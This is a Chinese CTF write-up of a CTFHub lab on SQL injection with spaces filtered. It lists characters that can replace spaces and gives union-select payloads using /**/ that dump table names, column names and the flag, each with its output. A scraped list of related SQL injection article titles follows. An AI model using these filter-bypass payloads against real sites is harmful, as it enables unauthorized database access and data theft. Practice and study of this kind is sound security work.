文章目录

  • 一、过滤空格的绕过
  • 二、注入过程
    • Ⅰ、爆表名
    • Ⅱ、爆列名
    • Ⅲ、爆flag

一、过滤空格的绕过

一般注入语句为

?id=0 union select database(),user()

由于过滤了空格致使无法执行注入的语句时,可使用以下字符代替空格,发挥同样效果

  1. ():一对圆括号
  2. +:加号
  3. %09、%0a、%0b、%0c、%0d:TAB水平制表符、换行符、垂直制表符、换页、回车的URL编码形式
  4. /**/:块注释符

二、注入过程

依次尝试发现只能使用块注释符替换,那么开始注入:

Ⅰ、爆表名

?id=10/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

ID: 1
Data: uphtdswtud,news

Ⅱ、爆列名

0/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='uphtdswtud'

ID: 1
Data: katnztegrp

Ⅲ、爆flag

0/**/union/**/select/**/1,katnztegrp/**/from/**/uphtdswtud

ID: 1
Data: ctfhub{b4b4e8cf9f38282496e9776c}

CTFHub_技能树_Web之SQL注入——过滤空格相关推荐

  1. mysql注入单引号被过滤_避开sql注入过滤的几个方法

    有的时候,很容易受到SQL注入攻击的程序,可能会进行输入过滤,用来防止攻击者无限制的利用其中存在的设计缺陷. 唱出会删除或者净化一些字符,或者阻止常用的sql关键词. 我们通常有以下几种技巧,去避开这 ...

  2. sql注入 mysql 猜数据库名字_web渗透-SQL注入数据库信息盗取

    sql注入原理 脚本代码接收来自前端数据未进行过滤,导致恶意sql语句插入到数据库中查询执行. 如下代码: $id = $_GET['id']; $sql = "select * from ...

  3. html sql注入_Web安全-SQL注入(sqli-lab)

    这篇文章为一个导航文章,用于记录关于SQL注入的学习过程.学习SQL注入,最好的实验环境就是sqli-lab,因此也是以这个环境来进行学习. 一.sqli-lab介绍和安装 1.sqli-lab Sq ...

  4. 看我如何绕过Cloudflare 的 SQL 注入过滤

     聚焦源代码安全,网罗国内外最新资讯! 作者:George Skouroupathis 编译:奇安信代码卫士团队 2018年年末,我受雇为某大客户执行 Web Application 安全评估.用自动 ...

  5. asp sql查询过滤空格_【技术干货】30个最适合初学者的SQL查询

    海牛学院的 | 第 598 期 本文预计阅读 | 11 分钟 毫无疑问,SQL或结构化查询语言是最流行的编程语言之一,尤其是因为它具有访问和修改数据库中数据的功能.SQL与数据库接口的基本用法是其流行 ...

  6. asp sql查询过滤空格_对比Excel,轻松学习SQL数据分析数据笔记02

    本文主要梳理<对比Excel,轻松学习SQL数据分析>对于自己有用的sql知识.这本书中的所有代码和函数均适用于my sql 8.0版本. SQL的基本功能数据定义(DDL)--对数据库, ...

  7. php+mysql防注入字符串过滤_php 防sql注入过滤代码

    我们提供了三个函数不来过滤一些特殊的字符,主要是利用php把sql敏感字符串给过滤掉了,好了下面来看看这款代码吧,有需要的朋友拿去看看,实例代码如下: function phpsql_show($st ...

  8. SQL注入基础原理与案例(详细总结)

    SQL注入基础原理与案例 一.前言 二.漏洞概述及危害 1.漏洞概述 2.漏洞危害 3.漏洞防范 三.SQL注入 1.SQL注入方式 (1)信息收集 (2)数据注入 (3)高权限注入 2.判断是否存在 ...

  9. ctfshow web入门 sql注入

    无过滤注入 web171 查询语句 $sql = "select username,password from user where username !='flag' and id = ' ...

最新文章

  1. XCode5中新建工程后强制使用了ARC,如何去掉?
  2. 【学无止境】基于ThinkPHP的OAuth2.0实现 ------ OAuth2.0个人学习笔记 One
  3. 【视频】vue指令之v-for
  4. android 百度地图 在线建议查询,Android 百度地图 SDK v3_3_0 (五) ---POI搜索和在线建议查询功能...
  5. Oracle代码块详解,Oracle可执行代码块
  6. 【POJ - 2318】TOYS(计算几何,叉积判断点与直线位置关系,二分)
  7. weblogic命令行操作
  8. 一处折腾笔记:Android内嵌html5加入原生微信分享的解决的方法
  9. 转载:基于大数据的互联网金融反洗钱模型初探
  10. 下载elasticsearch的jdbc包
  11. linux安装文件密码,linux安装包PGP加密验证
  12. 万年历的实现——C++Java版
  13. avue-crud初始化下拉列表,以及复选框,默认选中
  14. 青少年重度抑郁的动态功能连接:与严重程度和症状维度的关系
  15. android客户端直接调用芝麻信用的人脸认证
  16. python打开本地浏览器_使用webdriver打开本地浏览器--python版
  17. R语言统计入门第四章描述性统计和图形——4.3分组数据的汇总统计量
  18. MSK调制解调和误码率
  19. Tsmaster周期发送报文C代码脚本编写
  20. android 键盘退回 慢,调用软键盘的速度很慢。。。

热门文章

  1. 五、springboot 简单优雅是实现邮件服务
  2. 小三带着孩子要与自己共同拥有老公
  3. Redis计数器统计小程序用户停留时长
  4. python输入框_python 输入框
  5. 英汉习语文化差异及翻译
  6. JCE cannot authenticate the provider BC问题已解决
  7. 扎拉赞恩 服务器 微信群,《刀塔传奇》安卓新服【扎拉赞恩】开启公告
  8. java五子棋需求分析文档_五子棋需求文档.docx
  9. Vmware设置静态ip连网 ( 使用自定义Vmnet8 net )
  10. 励志名言短句霸气【古诗词版】